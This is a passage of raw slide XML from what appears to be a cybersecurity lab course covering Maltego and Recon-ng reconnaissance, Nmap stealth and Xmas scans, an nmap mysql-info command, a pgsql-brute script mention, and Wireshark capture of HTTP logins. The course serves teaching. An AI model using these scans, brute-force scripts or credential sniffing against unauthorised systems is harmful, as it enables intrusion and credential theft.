                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEEEE"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap -p 3306 --script=mysql-info &lt;target</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Note: 5432 for postgresql, script is pgsql-brute </a:t>
            </a:r>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="861300"/>
            <a:ext cx="5841976" cy="418730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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="86148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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>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5. Capture HTTP Packet and identify User Id and Password using Wireshark </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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7"/>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WIRESHARK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Wireshark is a network packet analyzer. A network packet analyzer presents captured packet data in as much detail as possible.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>You could think of a network packet analyzer as a measuring device for examining what’s happening inside a network cable, just like an electrician uses a voltmeter for examining what’s happening inside an electric cable (but at a higher level, of course).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Wireshark is available for free, is open source, and is one of the best packet analyzers available today.</a:t>
            </a:r>
            <a:endParaRPr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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183831" y="209361"/>
            <a:ext cx="64581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sz="2700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Wireshark having captured some packets and waiting for us to examine them.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="515" name="Google Shape;515;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654931" y="1069931"/>
            <a:ext cx="6278681" cy="396438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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2001863" y="63786"/>
            <a:ext cx="64581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Apply TCP Filter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="522" name="Google Shape;522;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="25675" t="12173" r="16249" b="19744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709831" y="861300"/>
            <a:ext cx="5726401" cy="419574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80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2001863" y="63786"/>
            <a:ext cx="64581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Apply IP Address Filter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="529" name="Google Shape;529;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="963469" y="799256"/>
            <a:ext cx="7334063" cy="422994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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego -h</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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java is /usr/bin/java</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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found java executable in PATH</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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pwd: file:/usr/share/maltego/maltego-ui/modules/ext/Java_Config_App.jar</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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install conf: /usr/share/maltego/etc/maltego.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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install version: v4.2.17</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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user conf: /root/.maltego/v4.2.17/etc/maltego.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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current java: /usr/lib/jvm/java-11-openjdk-amd64</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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/usr/lib/jvm: /usr/lib/jvm</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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/usr/lib/jvm: /usr/lib/jvm/java-11-openjdk-amd64</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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/usr/lib/jvm: /usr/lib/jvm/openjdk-11</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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/usr/lib/jvm: /usr/lib/jvm/default-java</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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/usr/lib/jvm: /usr/lib/jvm/java-1.11.0-openjdk-amd64</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">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81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074650" y="76105"/>
            <a:ext cx="64581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Apply Multiple Filter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="536" name="Google Shape;536;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153650" y="1045856"/>
            <a:ext cx="6836700" cy="38741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2"/>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ct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wireshark with HTTP:GET</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="77777"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Let’s begin our exploration of HTTP by downloading a very simple HTML file - one that is very short, and contains no embedded objects. Do the following:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-245109" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Start up your web browser.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-245109" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Start up the Wireshark packet sniffer,Enter “http” (just the letters, not the quotation marks) in the display-filter-specification window,</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-245109" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Wait a bit more than one minute, and then begin Wireshark packet capture.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-245109" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enter the following to your browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://gaia.cs.umass.edu/wireshark-labs/HTTP-wireshark-file1.html</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-245109" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Stop Wireshark packet capture.</a:t>
            </a:r>
            <a:endParaRPr sz="1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3"/>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Wireshark with HTTP:GET</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48525" y="-84919"/>
            <a:ext cx="2913300" cy="5214900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="68575" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Is your browser running HTTP version 1.0 or 1.1? What version of HTTP is the server running?</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
